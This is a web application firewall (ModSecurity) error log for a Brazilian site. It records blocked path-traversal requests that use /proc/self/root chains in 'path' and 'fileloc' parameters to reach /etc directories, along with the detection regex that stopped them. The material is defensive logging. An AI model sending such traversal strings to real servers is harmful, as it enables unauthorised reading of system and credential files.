https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:40.994665 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.241.46:48564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg10HjZBu2q05ozVU9evAAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:42.260184 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.241.46:48570] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg10lajLEzk2WiQ-10YZAAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:43.475633 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:48576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg107ysWC90G-1nBrBKrAAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:44.650172 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:48584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg11LysWC90G-1nBrBKrgAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:45.962638 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:48598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg11bysWC90G-1nBrBKsQAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:49.431346 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.241.46:48614] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg12Zqj1wV0Si-Okef1TwAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:50.718822 2026] [:error] [pid 15568:tid 140411565680384] [client 74.7.241.46:41220] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg12qQpVkWug9HeOt87sQAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:51.930045 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.241.46:41234] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg129SswJuvopo3lOhlOAAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:53.297084 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:41250] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg13Y6lpbStxTqkSktyygAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:54.495050 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:41252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg13tSswJuvopo3lOhlOgAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:54:57.931053 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:41266] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg14VajLEzk2WiQ-10YaQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:55:01.444665 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:49716] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg15f9ocpUE4ed4uDz1swAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:55:20.997667 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:49732] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1-FajLEzk2WiQ-10YfQAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:55:24.398136 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:42052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg1_P9ocpUE4ed4uDz1zgAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 13:56:13.230902 2026] [:error] [pid 21533:tid 140411699963648] [client 74.7.241.46:42054] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2LXjZBu2q05ozVU9fLgAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:56:41.493332 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:53364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2SbABkC4fWIHEf8H0kAAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:02.424986 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.241.46:52658] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/e2fsck.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2Xo6lpbStxTqkSktzDwAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:03.767711 2026] [:error] [pid 10772:tid 140411540502272] [client 74.7.241.46:56102] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2X_9ocpUE4ed4uDz2AQAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:05.154815 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.228.16:49962] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg2YdSswJuvopo3lOhlWAAAAI4"]
[Mon Mar 16 13:57:06.241559 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:56110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2YqQpVkWug9HeOt870AAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:07.131556 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.243.203:35224] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2Y1ajLEzk2WiQ-10YuwAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:07.634623 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:56114] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2Y6TCbgAP5jq5TegxLAAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
